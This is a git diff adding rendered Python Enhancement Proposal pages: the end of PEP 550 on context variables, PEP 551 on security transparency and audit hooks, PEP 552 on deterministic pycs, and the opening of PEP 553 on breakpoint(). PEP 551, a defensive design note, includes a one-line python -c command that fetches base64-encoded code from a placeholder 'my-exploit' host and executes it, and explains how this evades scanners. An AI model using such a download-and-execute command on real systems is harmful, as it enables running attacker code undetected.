APIs like redirecting stdout by overwriting sys.stdout, or +specifying new exception display hooks by overwriting the +sys.displayhook function are affecting the whole Python process +by design. Their users assume that the effect of changing +them will be visible across OS threads. Therefore, we cannot +just make these APIs to use the new Execution Context.

+

That said we think it is possible to design new APIs that will +be context aware, but that is outside of the scope of this PEP.

+
+
+

Greenlets

+

Greenlet is an alternative implementation of cooperative +scheduling for Python. Although greenlet package is not part of +CPython, popular frameworks like gevent rely on it, and it is +important that greenlet can be modified to support execution +contexts.

+

Conceptually, the behaviour of greenlets is very similar to that of +generators, which means that similar changes around greenlet entry +and exit can be done to add support for execution context. This +PEP provides the necessary C APIs to do that.

+
+
+

Context manager as the interface for modifications

+

This PEP concentrates on the low-level mechanics and the minimal +API that enables fundamental operations with execution context.

+

For developer convenience, a high-level context manager interface +may be added to the contextvars module. For example:

+
with contextvars.set_var(var, 'foo'):
+    # ...
+
+
+
+
+

Setting and restoring context variables

+

The ContextVar.delete() method removes the context variable from +the topmost logical context.

+

If the variable is not found in the topmost logical context, a +LookupError is raised, similarly to del var raising +NameError when var is not in scope.

+

This method is useful when there is a (rare) need to correctly restore +the state of a logical context, such as when a nested generator +wants to modify the logical context temporarily:

+
var = contextvars.ContextVar('var')
+
+def gen():
+    with some_var_context_manager('gen'):
+        # EC = [{var: 'main'}, {var: 'gen'}]
+        assert var.get() == 'gen'
+        yield
+
+    # EC = [{var: 'main modified'}, {}]
+    assert var.get() == 'main modified'
+    yield
+
+def main():
+    var.set('main')
+    g = gen()
+    next(g)
+    var.set('main modified')
+    next(g)
+
+
+

The above example would work correctly only if there is a way to +delete var from the logical context in gen(). Setting it +to a “previous value” in __exit__() would mask changes made +in main() between the iterations.

+
+
+

Alternative Designs for ContextVar API

+
+

Logical Context with stacked values

+

By the design presented in this PEP, logical context is a simple +LC({ContextVar: value, ...}) mapping. An alternative +representation is to store a stack of values for each context +variable: LC({ContextVar: [val1, val2, ...], ...}).

+

The ContextVar methods would then be:

+
    +
  • get(*, default=None) – traverses the stack +of logical contexts, and returns the top value from the +first non-empty logical context;
  • +
  • push(val) – pushes val onto the stack of values in the +current logical context;
  • +
  • pop() – pops the top value from the stack of values in +the current logical context.
  • +
+

Compared to the single-value design with the set() and +delete() methods, the stack-based approach allows for a simpler +implementation of the set/restore pattern. However, the mental +burden of this approach is considered to be higher, since there +would be two stacks to consider: a stack of LCs and a stack of +values in each LC.

+

(This idea was suggested by Nathaniel Smith.)

+
+
+

ContextVar “set/reset”

+

Yet another approach is to return a special object from +ContextVar.set(), which would represent the modification of +the context variable in the current logical context:

+
var = contextvars.ContextVar('var')
+
+def foo():
+    mod = var.set('spam')
+
+    # ... perform work
+
+    mod.reset()  # Reset the value of var to the original value
+                 # or remove it from the context.
+
+
+

The critical flaw in this approach is that it becomes possible to +pass context var “modification objects” into code running in a +different execution context, which leads to undefined side effects.

+
+
+
+
+

Backwards Compatibility

+

This proposal preserves 100% backwards compatibility.

+
+
+

Rejected Ideas

+
+

Replication of threading.local() interface

+

Choosing the threading.local()-like interface for context +variables was considered and rejected for the following reasons:

+
    +
  • A survey of the standard library and Django has shown that the +vast majority of threading.local() uses involve a single +attribute, which indicates that the namespace approach is not +as helpful in the field.
  • +
  • Using __getattr__() instead of .get() for value lookup +does not provide any way to specify the depth of the lookup +(i.e. search only the top logical context).
  • +
  • Single-value ContextVar is easier to reason about in terms +of visibility. Suppose ContextVar() is a namespace, +and the consider the following:
    ns = contextvars.ContextVar('ns')
    +
    +def gen():
    +    ns.a = 2
    +    yield
    +    assert ns.b == 'bar' # ??
    +
    +def main():
    +    ns.a = 1
    +    ns.b = 'foo'
    +    g = gen()
    +    next(g)
    +    # should not see the ns.a modification in gen()
    +    assert ns.a == 1
    +    # but should gen() see the ns.b modification made here?
    +    ns.b = 'bar'
    +    yield
    +
    +
    +

    The above example demonstrates that reasoning about the visibility +of different attributes of the same context var is not trivial.

    +
  • +
  • Single-value ContextVar allows straightforward implementation +of the lookup cache;
  • +
  • Single-value ContextVar interface allows the C-API to be +simple and essentially the same as the Python API.
  • +
+

See also the mailing list discussion: [26], [27].

+
+
+

Coroutines not leaking context changes by default

+

In V4 (Version History) of this PEP, coroutines were considered to +behave exactly like generators with respect to the execution context: +changes in awaited coroutines were not visible in the outer coroutine.

+

This idea was rejected on the grounds that is breaks the semantic +similarity of the task and thread models, and, more specifically, +makes it impossible to reliably implement asynchronous context +managers that modify context vars, since __aenter__ is a +coroutine.

+
+
+
+

Appendix: HAMT Performance Analysis

+
+../_images/pep-0550-hamt_vs_dict-v2.png + +
+

Figure 1. Benchmark code can be found here: [9].

+
+
+

The above chart demonstrates that:

+
    +
  • HAMT displays near O(1) performance for all benchmarked +dictionary sizes.
  • +
  • dict.copy() becomes very slow around 100 items.
  • +
+
+../_images/pep-0550-lookup_hamt.png + +
+

Figure 2. Benchmark code can be found here: [10].

+
+
+

Figure 2 compares the lookup costs of dict versus a HAMT-based +immutable mapping. HAMT lookup time is 30-40% slower than Python dict +lookups on average, which is a very good result, considering that the +latter is very well optimized.

+

There is research [8] showing that there are further possible +improvements to the performance of HAMT.

+

The reference implementation of HAMT for CPython can be found here: +[7].

+
+
+

Acknowledgments

+

Thanks to Victor Petrovykh for countless discussions around the topic +and PEP proofreading and edits.

+

Thanks to Nathaniel Smith for proposing the ContextVar design +[17] [18], for pushing the PEP towards a more complete design, and +coming up with the idea of having a stack of contexts in the thread +state.

+

Thanks to Alyssa (Nick) Coghlan for numerous suggestions and ideas on the +mailing list, and for coming up with a case that cause the complete +rewrite of the initial PEP version [19].

+
+
+

Version History

+
    +
  1. Initial revision, posted on 11-Aug-2017 [20].
  2. +
  3. V2 posted on 15-Aug-2017 [21].

    The fundamental limitation that caused a complete redesign of the +first version was that it was not possible to implement an iterator +that would interact with the EC in the same way as generators +(see [19].)

    +

    Version 2 was a complete rewrite, introducing new terminology +(Local Context, Execution Context, Context Item) and new APIs.

    +
  4. +
  5. V3 posted on 18-Aug-2017 [22].

    Updates:

    +
      +
    • Local Context was renamed to Logical Context. The term “local” +was ambiguous and conflicted with local name scopes.
    • +
    • Context Item was renamed to Context Key, see the thread with Alyssa +Coghlan, Stefan Krah, and Yury Selivanov [23] for details.
    • +
    • Context Item get cache design was adjusted, per Nathaniel Smith’s +idea in [25].
    • +
    • Coroutines are created without a Logical Context; ceval loop +no longer needs to special case the await expression +(proposed by Alyssa Coghlan in [24].)
    • +
    +
  6. +
  7. V4 posted on 25-Aug-2017 [31].
      +
    • The specification section has been completely rewritten.
    • +
    • Coroutines now have their own Logical Context. This means +there is no difference between coroutines, generators, and +asynchronous generators w.r.t. interaction with the Execution +Context.
    • +
    • Context Key renamed to Context Var.
    • +
    • Removed the distinction between generators and coroutines with +respect to logical context isolation.
    • +
    +
  8. +
  9. V5 posted on 01-Sep-2017: the current version. +
  10. +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0550.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0551/index.html b/pep-0551/index.html new file mode 100644 index 00000000000..45e0b944032 --- /dev/null +++ b/pep-0551/index.html @@ -0,0 +1,602 @@ + + + + + + + + PEP 551 – Security transparency in the Python runtime | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 551 – Security transparency in the Python runtime

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
23-Aug-2017
+
Python-Version:
+
3.7
+
Post-History:
+
24-Aug-2017, 28-Aug-2017
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been withdrawn. For information about integrated +CPython into a secure environment, we recommend consulting your own +security experts.

+
+
+

Relationship to PEP 578

+

This PEP has been split into two since its original posting.

+

See PEP 578 for the +auditing APIs proposed for addition to the next version of Python.

+

This is now an informational PEP, providing guidance to those planning +to integrate Python into their secure or audited environments.

+
+
+

Abstract

+

This PEP describes the concept of security transparency and how it +applies to the Python runtime. Visibility into actions taken by the +runtime is invaluable in integrating Python into an otherwise secure +and/or monitored environment.

+

The audit hooks described in PEP 578 are an essential component in +detecting, identifying and analyzing misuse of Python. While the hooks +themselves are neutral (in that not every reported event is inherently +misuse), they provide essential context to those who are responsible +for monitoring an overall system or network. With enough transparency, +attackers are no longer able to hide.

+
+
+

Background

+

Software vulnerabilities are generally seen as bugs that enable remote +or elevated code execution. However, in our modern connected world, the +more dangerous vulnerabilities are those that enable advanced persistent +threats (APTs). APTs are achieved when an attacker is able to penetrate +a network, establish their software on one or more machines, and over +time extract data or intelligence. Some APTs may make themselves known +by maliciously damaging data (e.g., WannaCrypt) +or hardware (e.g., Stuxnet). +Most attempt to hide their existence and avoid detection. APTs often use +a combination of traditional vulnerabilities, social engineering, +phishing (or spear-phishing), thorough network analysis, and an +understanding of misconfigured environments to establish themselves and +do their work.

+

The first infected machines may not be the final target and may not +require special privileges. For example, an APT that is established as a +non-administrative user on a developer’s machine may have the ability to +spread to production machines through normal deployment channels. It is +common for APTs to persist on as many machines as possible, with sheer +weight of presence making them difficult to remove completely.

+

Whether an attacker is seeking to cause direct harm or hide their +tracks, the biggest barrier to detection is a lack of insight. System +administrators with large networks rely on distributed logs to +understand what their machines are doing, but logs are often filtered to +show only error conditions. APTs that are attempting to avoid detection +will rarely generate errors or abnormal events. Reviewing normal +operation logs involves a significant amount of effort, though work is +underway by a number of companies to enable automatic anomaly detection +within operational logs. The tools preferred by attackers are ones that +are already installed on the target machines, since log messages from +these tools are often expected and ignored in normal use.

+

At this point, we are not going to spend further time discussing the +existence of APTs or methods and mitigations that do not apply to this +PEP. For further information about the field, we recommend reading or +watching the resources listed under Further Reading.

+

Python is a particularly interesting tool for attackers due to its +prevalence on server and developer machines, its ability to execute +arbitrary code provided as data (as opposed to native binaries), and its +complete lack of internal auditing. This allows attackers to download, +decrypt, and execute malicious code with a single command:

+
python -c "import urllib.request, base64;
+    exec(base64.b64decode(
+        urllib.request.urlopen('http://my-exploit/py.b64')
+    ).decode())"
+
+
+

This command currently bypasses most anti-malware scanners that rely on +recognizable code being read through a network connection or being +written to disk (base64 is often sufficient to bypass these checks). It +also bypasses protections such as file access control lists or +permissions (no file access occurs), approved application lists +(assuming Python has been approved for other uses), and automated +auditing or logging (assuming Python is allowed to access the internet +or access another machine on the local network from which to obtain its +payload).

+

General consensus among the security community is that totally +preventing attacks is infeasible and defenders should assume that they +will often detect attacks only after they have succeeded. This is known +as the “assume breach” mindset. [1] In this scenario, protections such +as sandboxing and input validation have already failed, and the +important task is detection, tracking, and eventual removal of the +malicious code. To this end, the primary feature required from Python is +security transparency: the ability to see what operations the Python +runtime is performing that may indicate anomalous or malicious use. +Preventing such use is valuable, but secondary to the need to know that +it is occurring.

+

To summarise the goals in order of increasing importance:

+
    +
  • preventing malicious use is valuable
  • +
  • detecting malicious use is important
  • +
  • detecting attempts to bypass detection is critical
  • +
+

One example of a scripting engine that has addressed these challenges is +PowerShell, which has recently been enhanced towards similar goals of +transparency and prevention. [2]

+

Generally, application and system configuration will determine which +events within a scripting engine are worth logging. However, given the +value of many logs events are not recognized until after an attack is +detected, it is important to capture as much as possible and filter +views rather than filtering at the source (see the No Easy Breach video +from Further Reading). Events that are always of interest include +attempts to bypass auditing, attempts to load and execute code that is +not correctly signed or access-controlled, use of uncommon operating +system functionality such as debugging or inter-process inspection +tools, most network access and DNS resolution, and attempts to create +and hide files or configuration settings on the local machine.

+

To summarize, defenders have a need to audit specific uses of Python in +order to detect abnormal or malicious usage. With PEP 578, the Python +runtime gains the ability to provide this. The aim of this PEP is to +assist system administrators with deploying a security transparent +version of Python that can integrate with their existing auditing and +protection systems.

+

On Windows, some specific features that may be integrated through the +hooks added by PEP 578 include:

+
    +
  • Script Block Logging [3]
  • +
  • DeviceGuard [4]
  • +
  • AMSI [5]
  • +
  • Persistent Zone Identifiers [6]
  • +
  • Event tracing (which includes event forwarding) [7]
  • +
+

On Linux, some specific features that may be integrated are:

+
    +
  • gnupg [8]
  • +
  • sd_journal [9]
  • +
  • OpenBSM [10]
  • +
  • syslog [11]
  • +
  • auditd [12]
  • +
  • SELinux labels [13]
  • +
  • check execute bit on imported modules
  • +
+

On macOS, some features that may be integrated are:

+ +

Overall, the ability to enable these platform-specific features on +production machines is highly appealing to system administrators and +will make Python a more trustworthy dependency for application +developers.

+

True security transparency is not fully achievable by Python in +isolation. The runtime can audit as many events as it likes, but unless +the logs are reviewed and analyzed there is no value. Python may impose +restrictions in the name of security, but usability may suffer. +Different platforms and environments will require different +implementations of certain security features, and organizations with the +resources to fully customize their runtime should be encouraged to do +so.

+
+
+

Summary Recommendations

+

These are discussed in greater detail in later sections, but are +presented here to frame the overall discussion.

+

Sysadmins should provide and use an alternate entry point (besides +python.exe or pythonX.Y) in order to reduce surface area and +securely enable audit hooks. A discussion of what could be restricted +is below in Restricting the Entry Point.

+

Sysadmins should use all available measures provided by their operating +system to prevent modifications to their Python installation, such as +file permissions, access control lists and signature validation.

+

Sysadmins should log everything and collect logs to a central location +as quickly as possible - avoid keeping logs on outer-ring machines.

+

Sysadmins should prioritize _detection_ of misuse over _prevention_ of +misuse.

+
+
+

Restricting the Entry Point

+

One of the primary vulnerabilities exposed by the presence of Python +on a machine is the ability to execute arbitrary code without +detection or verification by the system. This is made significantly +easier because the default entry point (python.exe on Windows and +pythonX.Y on other platforms) allows execution from the command +line, from standard input, and does not have any hooks enabled by +default.

+

Our recommendation is that production machines should use a modified +entry point instead of the default. Once outside of the development +environment, there is rarely a need for the flexibility offered by the +default entry point.

+

In this section, we describe a hypothetical spython entry point +(spython.exe on Windows; spythonX.Y on other platforms) that +provides a level of security transparency recommended for production +machines. An associated example implementation shows many of the +features described here, though with a number of concessions for the +sake of avoiding platform-specific code. A sufficient implementation +will inherently require some integration with platform-specific +security features.

+

Official distributions will not include any spython by default, but +third party distributions may include appropriately modified entry +points that use the same name.

+

Remove most command-line arguments

+

The spython entry point requires a script file be passed as the +first argument, and does not allow any options to precede it. This +prevents arbitrary code execution from in-memory data or non-script +files (such as pickles, which could be executed using +-m pickle <path>.

+

Options -B (do not write bytecode), -E (ignore environment +variables) and -s (no user site) are assumed.

+

If a file with the same full path as the process with a ._pth suffix +(spython._pth on Windows, spythonX.Y._pth on Linux) exists, it +will be used to initialize sys.path following the rules currently +described for Windows.

+

For the sake of demonstration, the example implementation of +spython also allows the -i option to start in interactive mode. +This is not recommended for restricted entry points.

+

Log audited events

+

Before initialization, spython sets an audit hook that writes all +audited events to an OS-managed log file. On Windows, this is the Event +Tracing functionality,[7]_ and on other platforms they go to +syslog.[11]_ Logs are copied from the machine as frequently as possible +to prevent loss of information should an attacker attempt to clear +local logs or prevent legitimate access to the machine.

+

The audit hook will also abort all sys.addaudithook events, +preventing any other hooks from being added.

+

The logging hook is written in native code and configured before the +interpreter is initialized. This is the only opportunity to ensure that +no Python code executes without auditing, and that Python code cannot +prevent registration of the hook.

+

Our primary aim is to record all actions taken by all Python processes, +so that detection may be performed offline against logged events. +Having all events recorded also allows for deeper analysis and the use +of machine learning algorithms. These are useful for detecting +persistent attacks, where the attacker is intending to remain within +the protected machines for some period of time, as well as for later +analysis to determine the impact and exposure caused by a successful +attack.

+

The example implementation of spython writes to a log file on the +local machine, for the sake of demonstration. When started with -i, +the example implementation writes all audit events to standard error +instead of the log file. The SPYTHONLOG environment variable can be +used to specify the log file location.

+

Restrict importable modules

+

Also before initialization, spython sets an open-for-import hook +that validates all files opened with os.open_for_import. This +implementation requires all files to have a .py suffix (preventing +the use of cached bytecode), and will raise a custom audit event +spython.open_for_import containing (filename, True_if_allowed).

+

After opening the file, the entire contents is read into memory in a +single buffer and the file is closed.

+

Compilation will later trigger a compile event, so there is no need +to validate the contents now using mechanisms that also apply to +dynamically generated code. However, if a whitelist of source files or +file hashes is available, then other validation mechanisms such as +DeviceGuard [4] should be performed here.

+

Restrict globals in pickles

+

The spython entry point will abort all pickle.find_class events +that use the default implementation. Overrides will not raise audit +events unless explicitly added, and so they will continue to be allowed.

+

Prevent os.system

+

The spython entry point aborts all os.system calls.

+

It should be noted here that subprocess.Popen(shell=True) is +allowed (though logged via the platform-specific process creation +events). This tradeoff is made because it is much simpler to induce a +running application to call os.system with a single string argument +than a function with multiple arguments, and so it is more likely to be +used as part of an exploit. There is also little justification for +using os.system in production code, while subprocess.Popen has +a large number of legitimate uses. Though logs indicating the use of +the shell=True argument should be more carefully scrutinised.

+

Sysadmins are encouraged to make these kinds of tradeoffs between +restriction and detection, and generally should prefer detection.

+
+
+

General Recommendations

+

Recommendations beyond those suggested in the previous section are +difficult, as the ideal configuration for any environment depends on +the sysadmin’s ability to manage, monitor, and respond to activity on +their own network. Nonetheless, here we attempt to provide some context +and guidance for integrating Python into a complete system.

+

This section provides recommendations using the terms should (or +should not), indicating that we consider it risky to ignore the +advice, and may, indicating that for the advice ought to be +considered for high value systems. The term sysadmin refers to +whoever is responsible for deploying Python throughout the network; +different organizations may have an alternative title for the +responsible people.

+

Sysadmins should build their own entry point, likely starting from +the spython source, and directly interface with the security systems +available in their environment. The more tightly integrated, the less +likely a vulnerability will be found allowing an attacker to bypass +those systems. In particular, the entry point should not obtain any +settings from the current environment, such as environment variables, +unless those settings are otherwise protected from modification.

+

Audit messages should not be written to a local file. The +spython entry point does this for example and testing purposes. On +production machines, tools such as ETW [7] or auditd [12] that are +intended for this purpose should be used.

+

The default python entry point should not be deployed to +production machines, but could be given to developers to use and test +Python on non-production machines. Sysadmins may consider deploying +a less restrictive version of their entry point to developer machines, +since any system connected to your network is a potential target. +Sysadmins may deploy their own entry point as python to obscure +the fact that extra auditing is being included.

+

Python deployments should be made read-only using any available +platform functionality after deployment and during use.

+

On platforms that support it, sysadmins should include signatures +for every file in a Python deployment, ideally verified using a private +certificate. For example, Windows supports embedding signatures in +executable files and using catalogs for others, and can use DeviceGuard +[4] to validate signatures either automatically or using an +open_for_import hook.

+

Sysadmins should log as many audited events as possible, and +should copy logs off of local machines frequently. Even if logs are +not being constantly monitored for suspicious activity, once an attack +is detected it is too late to enable auditing. Audit hooks should +not attempt to preemptively filter events, as even benign events are +useful when analyzing the progress of an attack. (Watch the “No Easy +Breach” video under Further Reading for a deeper look at this side of +things.)

+

Most actions should not be aborted if they could ever occur during +normal use or if preventing them will encourage attackers to work around +them. As described earlier, awareness is a higher priority than +prevention. Sysadmins may audit their Python code and abort +operations that are known to never be used deliberately.

+

Audit hooks should write events to logs before attempting to abort. +As discussed earlier, it is more important to record malicious actions +than to prevent them.

+

Sysadmins should identify correlations between events, as a change +to correlated events may indicate misuse. For example, module imports +will typically trigger the import auditing event, followed by an +open_for_import call and usually a compile event. Attempts to +bypass auditing will often suppress some but not all of these events. So +if the log contains import events but not compile events, +investigation may be necessary.

+

The first audit hook should be set in C code before +Py_Initialize is called, and that hook should unconditionally +abort the sys.addloghook event. The Python interface is primarily +intended for testing and development.

+

To prevent audit hooks being added on non-production machines, an entry +point may add an audit hook that aborts the sys.addloghook event +but otherwise does nothing.

+

On production machines, a non-validating open_for_import hook +may be set in C code before Py_Initialize is called. This +prevents later code from overriding the hook, however, logging the +setopenforexecutehandler event is useful since no code should ever +need to call it. Using at least the sample open_for_import hook +implementation from spython is recommended.

+

Since importlib’s use of open_for_import may be easily bypassed +with monkeypatching, an audit hook should be used to detect +attribute changes on type objects.

+
+
+

Things not to do

+

This section discusses common or “obviously good” recommendations that +we are specifically not making. These range from useless or incorrect +through to ideas that are simply not feasible in any real world +environment.

+

Do not attempt to implement a sandbox within the Python runtime. +There is a long history of attempts to allow arbitrary code limited use +of Python features (such as [14]), but no general success. The best +options are to run unrestricted Python within a sandboxed environment +with at least hypervisor-level isolation, or to prevent unauthorised +code from starting at all.

+

Do not rely on static analysis to verify untrusted code before use. +The best options are to pre-authorise trusted code, such as with code +signing, and if not possible to identify known-bad code, such as with +an anti-malware scanner.

+

Do not use audit hooks to abort operations without logging the +event first. You will regret not knowing why your process disappeared.

+

[TODO - more bad advice]

+
+
+

Further Reading

+
+
Redefining Malware: When Old Terms Pose New Threats
By Aviv Raff for SecurityWeek, 29th January 2014

This article, and those linked by it, are high-level summaries of the rise of +APTs and the differences from “traditional” malware.

+

http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats

+
+
Anatomy of a Cyber Attack
By FireEye, accessed 23rd August 2017

A summary of the techniques used by APTs, and links to a number of relevant +whitepapers.

+

https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html

+
+
Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection
By Aviv Raff for SecurityWeek, 8th May 2014

High-level summary of the value of detailed logging and automatic analysis.

+

http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection

+
+
No Easy Breach: Challenges and Lessons Learned from an Epic Investigation
Video presented by Matt Dunwoody and Nick Carr for Mandiant at SchmooCon 2016

Detailed walkthrough of the processes and tools used in detecting and removing +an APT.

+

https://archive.org/details/No_Easy_Breach

+
+
Disrupting Nation State Hackers
Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

Good security practices, capabilities and recommendations from the chief of +NSA’s Tailored Access Operation.

+

https://www.youtube.com/watch?v=bDJb8WOJYdA

+
+
+
+
+

References

+ +
+
+

Acknowledgments

+

Thanks to all the people from Microsoft involved in helping make the +Python runtime safer for production use, and especially to James Powell +for doing much of the initial research, analysis and implementation, Lee +Holmes for invaluable insights into the info-sec field and PowerShell’s +responses, and Brett Cannon for the restraining and grounding +discussions.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0551.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0552/index.html b/pep-0552/index.html new file mode 100644 index 00000000000..3fe0ec27f1e --- /dev/null +++ b/pep-0552/index.html @@ -0,0 +1,258 @@ + + + + + + + + PEP 552 – Deterministic pycs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 552 – Deterministic pycs

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
07-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an extension to the pyc format to make it more deterministic.

+
+
+

Rationale

+

A reproducible build is one where the same byte-for-byte output is generated +every time the same sources are built—even across different machines (naturally +subject to the requirement that they have rather similar environments +set up). Reproducibility is important for security. It is also a key concept in +content-based build systems such as Bazel, which are most effective when the +output files’ contents are a deterministic function of the input files’ +contents.

+

The current Python pyc format is the marshaled code object of the module +prefixed by a magic number, the source timestamp, and the source file +size. The presence of a source timestamp means that a pyc is not a deterministic +function of the input file’s contents—it also depends on volatile metadata, the +mtime of the source. Thus, pycs are a barrier to proper reproducibility.

+

Distributors of Python code are currently stuck with the options of

+
    +
  1. not distributing pycs and losing the caching advantages
  2. +
  3. distributing pycs and losing reproducibility
  4. +
  5. carefully giving all Python source files a deterministic timestamp +(see, for example, https://github.com/python/cpython/pull/296)
  6. +
  7. doing a complicated mixture of 1. and 2. like generating pycs at installation +time
  8. +
+

None of these options are very attractive. This PEP proposes allowing the +timestamp to be replaced with a deterministic hash. The current timestamp +invalidation method will remain the default, though. Despite its nondeterminism, +timestamp invalidation works well for many workflows and usecases. The +hash-based pyc format can impose the cost of reading and hashing every source +file, which is more expensive than simply checking timestamps. Thus, for now, we +expect it to be used mainly by distributors and power use cases.

+

(Note there are other problems [1] [2] we do not +address here that can make pycs non-deterministic.)

+
+
+

Specification

+

The pyc header currently consists of 3 32-bit words. We will expand it to 4. The +first word will continue to be the magic number, versioning the bytecode and pyc +format. The second word, conceptually the new word, will be a bit field. The +interpretation of the rest of the header and invalidation behavior of the pyc +depends on the contents of the bit field.

+

If the bit field is 0, the pyc is a traditional timestamp-based pyc. I.e., the +third and forth words will be the timestamp and file size respectively, and +invalidation will be done by comparing the metadata of the source file with that +in the header.

+

If the lowest bit of the bit field is set, the pyc is a hash-based pyc. We call +the second lowest bit the check_source flag. Following the bit field is a +64-bit hash of the source file. We will use a SipHash with a hardcoded key of +the contents of the source file. Another fast hash like MD5 or BLAKE2 would +also work. We choose SipHash because Python already has a builtin implementation +of it from PEP 456, although an interface that allows picking the SipHash key +must be exposed to Python. Security of the hash is not a concern, though we pass +over completely-broken hashes like MD5 to ease auditing of Python in controlled +environments.

+

When Python encounters a hash-based pyc, its behavior depends on the setting of +the check_source flag. If the check_source flag is set, Python will +determine the validity of the pyc by hashing the source file and comparing the +hash with the expected hash in the pyc. If the pyc needs to be regenerated, it +will be regenerated as a hash-based pyc again with the check_source flag +set.

+

For hash-based pycs with the check_source unset, Python will simply load the +pyc without checking the hash of the source file. The expectation in this case +is that some external system (e.g., the local Linux distribution’s package +manager) is responsible for keeping pycs up to date, so Python itself doesn’t +have to check. Even when validation is disabled, the hash field should be set +correctly, so out-of-band consistency checkers can verify the up-to-dateness of +the pyc. Note also that the PEP 3147 edict that pycs without corresponding +source files not be loaded will still be enforced for hash-based pycs.

+

The programmatic APIs of py_compile and compileall will support +generation of hash-based pycs. Principally, py_compile will define a new +enumeration corresponding to all the available pyc invalidation modules:

+
class PycInvalidationMode(Enum):
+    TIMESTAMP
+    CHECKED_HASH
+    UNCHECKED_HASH
+
+
+

py_compile.compile, compileall.compile_dir, and +compileall.compile_file will all gain an invalidation_mode parameter, +which accepts a value of the PycInvalidationMode enumeration.

+

The compileall tool will be extended with a command new option, +--invalidation-mode to generate hash-based pycs with and without the +check_source bit set. --invalidation-mode will be a tristate option +taking values timestamp (the default), checked-hash, and +unchecked-hash corresponding to the values of PycInvalidationMode.

+

importlib.util will be extended with a source_hash(source) function that +computes the hash used by the pyc writing code for a bytestring source.

+

Runtime configuration of hash-based pyc invalidation will be facilitated by a +new --check-hash-based-pycs interpreter option. This is a tristate option, +which may take 3 values: default, always, and never. The default +value, default, means the check_source flag in hash-based pycs +determines invalidation as described above. always causes the interpreter to +hash the source file for invalidation regardless of value of check_source +bit. never causes the interpreter to always assume hash-based pycs are +valid. When --check-hash-based-pycs=never is in effect, unchecked hash-based +pycs will be regenerated as unchecked hash-based pycs. Timestamp-based pycs are +unaffected by --check-hash-based-pycs.

+
+
+

References

+ +
+
+

Credits

+

The author would like to thank Gregory P. Smith, Christian Heimes, and Steve +Dower for useful conversations on the topic of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0552.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0553/index.html b/pep-0553/index.html new file mode 100644 index 00000000000..8361ef19f14 --- /dev/null +++ b/pep-0553/index.html @@ -0,0 +1,400 @@ + + + + + + + + PEP 553 – Built-in breakpoint() | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 553 – Built-in breakpoint()

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
05-Sep-2017, 07-Sep-2017, 13-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding a new built-in function called breakpoint() which +enters a Python debugger at the point of the call. Additionally, two new +names are added to the sys module to make the choice of which debugger is +entered configurable.

+
+
+

Rationale

+

Python has long had a great debugger in its standard library called pdb. +Setting a break point is commonly written like this:

+
foo()
+import pdb; pdb.set_trace()
+bar()
+
+
+

Thus after executing foo() and before executing bar(), Python will +enter the debugger. However this idiom has several disadvantages.

+
    +
  • It’s a lot to type (27 characters).
  • +
  • It’s easy to typo. The PEP author often mistypes this line, e.g. omitting +the semicolon, or typing a dot instead of an underscore.
  • +
  • It ties debugging directly to the choice of pdb. There might be other +debugging options, say if you’re using an IDE or some other development +environment.
  • +
  • Python linters (e.g. flake8 [linters]) complain about this line because it +contains two statements. Breaking the idiom up into two lines complicates +its use because there are more opportunities for mistakes at clean up time. +I.e. you might forget to delete one of those lines when you no longer need +to debug the code.
  • +
+

Python developers also have many other debuggers to choose from, but +remembering how to invoke them can be problematic. For example, even when +IDEs have user interface for setting breakpoints, it may still be more +convenient to just edit the code. The APIs for entering the debugger +programmatically are inconsistent, so it can be difficult to remember exactly +what to type.

+

We can solve all these problems by providing a universal API for entering the +debugger, as proposed in this PEP.

+
+
+

Proposal

+

The JavaScript language provides a debugger statement [js-debugger] which enters +the debugger at the point where the statement appears.

+

This PEP proposes a new built-in function called breakpoint() +which enters a Python debugger at the call site. Thus the example +above would be written like so:

+
foo()
+breakpoint()
+bar()
+
+
+

Further, this PEP proposes two new name bindings for the sys +module, called sys.breakpointhook() and +sys.__breakpointhook__. By default, sys.breakpointhook() +implements the actual importing and entry into pdb.set_trace(), +and it can be set to a different function to change the debugger that +breakpoint() enters.

+

sys.__breakpointhook__ is initialized to the same function as +sys.breakpointhook() so that you can always easily reset +sys.breakpointhook() to the default value (e.g. by doing +sys.breakpointhook = sys.__breakpointhook__). This is exactly the same as +how the existing sys.displayhook() / sys.__displayhook__ and +sys.excepthook() / sys.__excepthook__ work [hooks].
